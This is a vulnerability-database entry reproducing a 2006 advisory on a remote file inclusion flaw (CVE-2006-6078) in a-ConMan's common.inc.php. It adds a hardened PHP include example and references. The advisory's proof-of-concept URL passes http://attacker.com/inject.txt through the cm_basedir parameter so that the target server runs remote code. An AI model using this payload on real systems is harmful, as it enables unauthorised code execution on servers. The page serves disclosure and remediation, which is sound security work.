A-Conman Common.Inc.PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1111638    Vulnerability type: Input validation
Published: 2006-11-22    Updated: 2006-11-30
CVE ID: CVE-2006-6078    CNNVD-ID: CNNVD-200611-393
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2831
https://cxsecurity.com/issue/WLB-2006110111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-393
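|Vulnerability details
A PHP remote file inclusion vulnerability exists in common.inc.php in a-ConMan. A remote attacker can execute arbitrary PHP code via a URL in the cm_basedir parameter.
|Exploit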
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_61$2006

------------------------------------------------------------------------------
[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion
------------------------------------------------------------------------------

Author		: Ahmad Maulana a.k.a Matdhule
Date Found	: November, 22nd 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv61-matdhule-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a-ConMan (Automated Content Management)

Application	: a-ConMan (Automated Content Management)
version		: 3.2beta
URL		: http://sourceforge.net/projects/a-conman

a-ConMan is a flexible database solution built to categorize and manage your image and video content. Giving you the ability to automate the building and updating for any type of content specific website within seconds. Utilizing one of the most advanced

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found a vulnerability in the script common.inc.php

-----------------------common.inc.php----------------------
....
<?php
include_once($cm_basedir."/ez_sql.php");
include_once($cm_basedir."/pg2ezsql.php");
// include_once($cm_basedir."/functions.php");
$ver = "3.1.1228";

...
----------------------------------------------------------

Input passed to the "cm_basedir" parameter in common.inc.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?


Solution:
~~~~~~~
- Sanitize variable $cm_basedir on common.inc.php.

---------------------------------------------------------------------------
Shoutz:
~~~
~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson    :)   
~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke
~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ Solpotcrew Comunity (#nyubicrew @ allindo.net), #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-11-22]
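
The fix the advisory asks for (sanitize $cm_basedir), sketched in PHP as an added example; it is not a-ConMan's code or the advisory author's. cm_safe_include_path is a hypothetical helper, and the example assumes that ez_sql.php and pg2ezsql.php sit in the same directory as common.inc.php and that the request value reaches $cm_basedir through register_globals, as the PoC URL suggests.

```php
<?php
// Added example: hardened replacement for the include lines in common.inc.php.
// Assumption: the two helper files live beside this script.
// Defence in depth in php.ini: allow_url_include = Off, register_globals = Off.

// Hypothetical helper: resolve $file against a fixed base directory and an
// allow-list. Returns the absolute path, or false if anything looks wrong.
function cm_safe_include_path($base, $file, array $allowed)
{
    // Only known file names may be included, never request-supplied names.
    if (!in_array($file, $allowed, true)) {
        return false;
    }
    // realpath() resolves local filesystem paths only, so a base such as
    // http://host/x fails here instead of being fetched and executed.
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($baseReal === false || $target === false) {
        return false;
    }
    // The resolved file must sit directly inside the resolved base, which
    // also rejects symlinks and ../ sequences that point elsewhere.
    if (dirname($target) !== $baseReal) {
        return false;
    }
    return $target;
}

// The base is derived from the script's own location, never from the request.
// Assigning it unconditionally overwrites any value injected through
// ?cm_basedir=... before this line runs.
$cm_basedir = dirname(__FILE__);

$allowed = array('ez_sql.php', 'pg2ezsql.php');
foreach ($allowed as $file) {
    $path = cm_safe_include_path($cm_basedir, $file, $allowed);
    if ($path === false) {
        // Fail closed without echoing the path back to the client.
        header('HTTP/1.1 500 Internal Server Error');
        exit('Configuration error');
    }
    include_once $path;
}
```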
|References

Source: BID
Name: 21255
Link: http://www.securityfocus.com/bid/21255
Source: BUGTRAQ
Name: 20061123 [ECHO_ADV_61_2006] a-ConMan <= v3.2beta Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/452433/100/0/threaded
Source: MILW0RM
Name: 2831
Link: http://www.milw0rm.com/exploits/2831
Source: VUPEN
Name: ADV-2006-4705
Link: http://www.frsirt.com/english/advisories/2006/4705
Source: SECTRACK
Name: 1017278
Link: http://securitytracker.com/id?1017278
Source: MISC
Link: http://advisories.echo.or.id/adv/adv61-matdhule-2006.txt
Source: SREASON
Name: 1909
Link: http://securityreason.com/securityalert/1909
Source: MILW0RM
Name: 2831
Link: http://milw0rm.com/exploits/2831